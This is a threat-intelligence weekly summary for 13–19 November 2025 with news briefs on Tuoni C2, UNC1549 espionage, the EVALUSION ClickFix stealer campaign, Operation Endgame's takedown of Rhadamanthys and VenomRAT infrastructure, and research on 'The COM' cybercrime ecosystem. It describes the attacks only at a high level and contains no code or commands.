< Back
hacker in front of screens

Tags:

Threat intelligence
19 November 2025

Weekly Summary Cyberattacks November 13-19

Researchers Detail Tuoni C2's Role in an Attempted 2025 Real Estate Cyber Intrusion   

A cyberattack attempt against a major U.S. real estate company was analyzed after being blocked during its early stages. The operation, which occurred in mid-October 2025, involved the Tuoni C2 framework, a free and modular command-and-control tool originally intended for penetration testing and red-team operations but increasingly observed in malicious activity. While Tuoni itself is a traditional C2 platform, the delivery chain used in this incident was notably advanced, incorporating AI-assisted scripting, steganography, and in-memory execution. 

Analysis of UNC1549 TTPs, Custom Tools, and Malware Targeting the Aerospace and Defense Ecosystem   

New insights into ongoing espionage campaigns attributed to the Iranian-linked threat group UNC1549 were reported, which since mid-2024 has intensified operations against aerospace, aviation, and defense organizations. The group relies on a dual initial-access strategy, combining highly targeted spear-phishing with compromises of third-party suppliers whose network privileges provide covert pathways into well-defended environments. Their phishing campaigns evolve over time, beginning with job-related lures to compromise general users and later pivoting to tailored password-reset spoofing aimed at IT administrators. 

EVALUSION Campaign Delivers Amatera Stealer and NetSupport RAT   

Threat actors are abusing the ClickFix initial access vector in a campaign referred to as EVALUSION to deploy Amatera Stealer and NetSupport RAT. Amatera is a rebranded version of ACR (AcridRain) Stealer, originally developed and sold by the actor SheldIO until its source code was sold in mid-2024. The malware provides extensive data theft capabilities, harvesting credentials, payment information, and files from browsers, 149+ crypto-wallet extensions, desktop wallets, 43+ password managers, FTP/email/VPN clients, and other applications. The infection chain begins with victims being socially engineered into executing commands via the Windows Run prompt, which launches multi-stage PowerShell loaders. 

Police Disrupts Rhadamanthys, VenomRAT, and Elysium Malware Operations   

Law enforcement authorities from nine countries dismantled more than 1,000 servers that supported the Rhadamanthys infostealer, the VenomRAT remote-access trojan, and the Elysium botnet as part of the latest phase of Operation Endgame, an international effort coordinated by Europol and Eurojust. The coordinated action, conducted between 10 and 13 November 2025, included searches at 11 locations across Germany, Greece, and the Netherlands, the seizure of 20 domains, and the takedown or disruption of 1,025 servers tied to these malware operations. A key suspect linked to VenomRAT was arrested in Greece on November 3, 2025. Europol reported that the dismantled infrastructure had infected hundreds of thousands of computers globally, enabling the theft of several million credentials. The main suspect behind the Rhadamanthys infostealer allegedly had access to over 100,000 compromised cryptocurrency wallets, potentially worth millions of euros. Many victims were unaware their systems were infected. Authorities encouraged the public to check for potential compromise through politie.nl/checkyourhack and haveibeenpwned.com. This phase of Operation Endgame was supported by more than 30 private-sector partners, including Cryptolaemus, Shadowserver, Spycloud, Cymru, Proofpoint, CrowdStrike, Lumen, Abuse.ch, HaveIBeenPwned, Spamhaus, DIVD, Trellix, and Bitdefender. A command post at Europol’s headquarters coordinated intelligence sharing, crypto-tracing, forensic support, and operational actions with officers from Australia, Canada, Denmark, France, Germany, Greece, the Netherlands, and the United States. The announcement also confirms earlier reports that the Rhadamanthys Malware-as-a-Service operation had been disrupted, with its customers losing access to servers after suspected law-enforcement intervention. According to communications from the Rhadamanthys developer, German IP addresses were seen accessing web panels hosted in EU data centers shortly before the disruption. Operation Endgame has been responsible for multiple recent disruptions against cybercrime infrastructure, previously targeting IcedID, Bumblebee, Pikabot, Trickbot, SystemBC, DanaBot, Smokeloader, and related criminal services. In addition to infrastructure seizures, police contacted criminal service users and exposed failing criminal platforms via the Operation Endgame website. Europol emphasized that despite these coordinated actions, further investigative and operational phases are expected.  

The COM: Anatomy of an English-Speaking Cybercriminal Ecosystem And The Origins of Scattered Lapsus$ Hunters   

A new research provides a comprehensive analysis of "The COM," an evolving English-speaking cybercriminal ecosystem that over the past decade has transformed from a niche community trading social media usernames into a global, service-based cybercrime economy driving large-scale data breaches, extortion, SIM swapping, ransomware incidents, cryptocurrency theft, and corporate intrusions. Rooted in mid-2010s forums such as Dark0de, RaidForums, and OGUsers, The COM now fuels some of the most disruptive, financially motivated, and reputation-driven threat operations. Its evolution shows how early identity traders and social engineers merged with technically skilled hackers, creating hybrid actors that blend manipulation, technical compromise, and public spectacle.